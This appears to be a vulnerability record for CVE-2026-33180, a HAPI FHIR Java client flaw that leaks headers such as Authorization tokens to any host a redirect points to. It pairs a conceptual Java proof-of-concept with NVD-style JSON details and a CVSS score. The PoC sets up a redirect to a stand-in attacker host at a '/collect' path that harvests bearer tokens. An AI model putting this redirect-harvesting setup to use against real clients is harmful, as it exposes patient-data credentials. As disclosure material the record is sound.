CVE-2026-33180

// This is a conceptual PoC demonstrating the header leakage scenario. // 1. Attacker sets up a malicious server that logs headers. // Malicious Server Response: // HTTP/1.1 302 Found // Location: http://attacker-controlled-server.com/collect // 2. Victim uses vulnerable HAPI FHIR client (< 6.9.0) import ca.uhn.fhir.rest.client.api.IGenericClient; import ca.uhn.fhir.context.FhirContext; public class HapiClient { public static void main(String[] args) { FhirContext ctx = FhirContext.forR4(); // Client configured to follow redirects (default behavior) IGenericClient client = ctx.newRestfulGenericClient("https://trusted-hapi-server.com"); // Adding a sensitive header (e.g., Authorization) client.registerInterceptor(new IClientInterceptor() { @Override public void interceptRequest(IHttpRequest theRequest) { theRequest.addHeader("Authorization", "Bearer sensitive-token-123"); } // ... other methods }); // Triggering a request that results in a redirect to the attacker // The vulnerable client will send "Authorization: Bearer sensitive-token-123" to attacker-controlled-server.com client.read().resource("Patient").withId("example").execute(); } }

{"cve": {"id": "CVE-2026-33180", "sourceIdentifier": "[email protected]", "published": "2026-03-20T23:16:45.020", "lastModified": "2026-04-28T21:13:28.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "HAPI FHIR is a complete implementation of the HL7 FHIR standard for healthcare interoperability in Java. Prior to version 6.9.0, when setting headers in HTTP requests, the internal HTTP client sends headers first to the host in the initial URL but also, if asked to follow redirects and a 30X HTTP response code is returned, to the host mentioned in URL in the Location: response header value. Sending the same set of headers to subsequent hosts is a problem as this header often contains privacy sensitive information or data that could allow others to impersonate the client's request. This issue has been patched in release 6.9.0. No known workarounds are available."}, {"lang": "es", "value": "HAPI FHIR es una implementación completa del estándar HL7 FHIR para la interoperabilidad sanitaria en Java. Antes de la versión 6.9.0, al establecer encabezados en las solicitudes HTTP, el cliente HTTP interno envía los encabezados primero al host en la URL inicial, pero también, si se le pide que siga redireccionamientos y se devuelve un código de respuesta HTTP 30X, al host mencionado en la URL en el valor del encabezado de respuesta Location:. Enviar el mismo conjunto de encabezados a hosts subsiguientes es un problema, ya que este encabezado a menudo contiene información sensible a la privacidad o datos que podrían permitir a otros suplantar la solicitud del cliente. Este problema ha sido parcheado en la versión 6.9.0. No se conocen soluciones alternativas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://github.com/hapifhir/org.hl7.fhir.core/security/advisories/GHSA-p7m9-v2cm-2h7m", "source": "[email protected]"}]}}